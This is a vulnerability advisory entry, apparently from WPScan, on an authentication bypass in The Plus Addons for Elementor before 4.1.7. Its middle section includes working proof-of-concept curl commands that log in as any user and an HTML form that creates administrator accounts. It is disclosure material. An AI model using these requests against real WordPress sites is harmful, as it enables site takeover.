Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpexploitVille Korhonen (Seravo), Antony Booker (WP Charged)WPEX-ID:C311FEEF-7041-4C21-9525-132B9BD32F89
HistoryMar 08, 2021 - 12:00 a.m.

The Plus Addons for Elementor Page Builder < 4.1.7 - Authentication Bypass

2021-03-0800:00:00
Ville Korhonen (Seravo), Antony Booker (WP Charged)
439
JSON

The plugin was being actively exploited to by malicious actors to bypass authentication, allowing unauthenticated users to log in as any user (including admin) by just providing the related username, as well as create accounts with arbitrary roles, such as admin. These issues can be exploited even if registration is disabled, and the Login widget is not active. The vendor was notified by the two reporters: - On March 6th, 2021 by Seravo, which was answered on March 7th, and the vulnerability acknowledged on March 9th. - On March 7th and 8th 2021 by WP Charged who saw the attacks start on March 5th, 2021. We (WPScanTeam) escalated to issues to Envato on Match 8th, 2021 after confirming them and finding another similar authbypass issue. The free version of the plugin on the WordPress repository did not seem affected by this issue.

The "theplus_ajax_login" and "theplus_google_ajax_register"  AJAX actions, available to unauthenticated users allow trivial authentication bypass as any user by only providing the related username

curl -X POST --data action=theplus_ajax_login --data email=admin -iLSS https://example.com/wp-admin/admin-ajax.php
curl -X POST --data action=theplus_google_ajax_register --data email=admin --data nonce=a -iLSS https://example.com/wp-admin/admin-ajax.php

Then, the "theplus_google_ajax_register" AJAX action can also allow any unauthenticated user to create accounts with arbitrary role, such as admin, and then get logged in automatically

<form method="POST" action="https://example.com/wp-admin/admin-ajax.php">
<input value="newadmin" name="name" type="text">
<input value="[email protected]" name="email" type="text">
<input value="test" name="password" type="text">
<input value="theplus_google_ajax_register" name="action" type="text">
<input value="administrator" name="tp_user_reg_role" type="text">
<input value="any" name="nonce" type="text">
<input type="submit" />
</form>

Finally, the "theplus_ajax_register" AJAX action can also allow unauthenticated user to create accounts with arbitrary role, such as admin, however this require the registration to be enabled, and the Login widget to be used.

Related

patchstack 1
cve 1
prion 1
threatpost 1
attackerkb 1
seebug 1
wpvulndb 1
patchstack
patchstack
WordPress The Plus Addons for Elementor premium plugin <= 4.1.6 - Privilege Escalation vulnerability
2021-03-08 00:00:00
cve
cve
CVE-2021-24175
2021-04-05 19:15:00
prion
prion
Authentication flaw
2021-04-05 19:15:00
threatpost
threatpost
Cyberattackers Exploiting Critical WordPress Plugin Bug
2021-03-10 20:25:47
attackerkb
attackerkb
CVE-2021-24175
2021-04-05 00:00:00
seebug
seebug
WordPress The Plus Addons for Elementor插件身份验证绕过漏洞(CVE-2021-24175)
2021-03-10 00:00:00
wpvulndb
wpvulndb
The Plus Addons for Elementor Page Builder < 4.1.7 - Authentication Bypass
2021-03-08 00:00:00
JSON
Related for WPEX-ID:C311FEEF-7041-4C21-9525-132B9BD32F89
patchstack1cve1prion1threatpost1attackerkb1seebug1wpvulndb1